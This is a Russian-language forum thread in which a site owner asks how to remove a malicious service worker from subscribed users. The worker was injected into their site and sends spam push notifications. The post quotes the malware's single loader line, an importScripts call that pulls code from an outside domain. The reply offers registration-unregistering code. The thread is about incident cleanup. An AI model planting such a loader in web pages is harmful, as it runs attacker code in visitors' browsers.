Как можно удалить всем пользователям вредоносный service worker?

Всем привет.
Недавно на одном из наших сайтов обнаружили вредоносный скрипт, который устанавливает service worker и в дальнейшем рассылает всем подписавшимся спамную push рассылку.

скрипт /ws.js содержит следующий код:
importScripts('https://wwserch44.biz/sw/w1s.js');

С данной технологией я столкнулся недавно и пока не представляю как она устроена, только начал изучать.
Подскажите, есть ли какая-нибудь возможность удалить данный сервис воркер у всех пользователей, которые подписались? Или теперь они будут всегда получать спам от нашего сайта?

И как вообще устроена push рассылка. Один раз пользователь подписался, service worker установился и теперь сторонний ресурс всегда может отправлять пуш уведомления? Или на сайте еще есть какой-то скрипт, через который они делают рассылку?
  • Вопрос задан
  • 868 просмотров
Пригласить эксперта
Ответы на вопрос 1
notiv-nt
@notiv-nt
Как ваше ничего? Да, моё тоже
navigator.serviceWorker.getRegistrations().then((registrations) => {
  for (let registration of registrations) {
    // registration.unregister();
  }
});


Вот такой API у каждого будет
https://developer.mozilla.org/en-US/docs/Web/API/S...
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы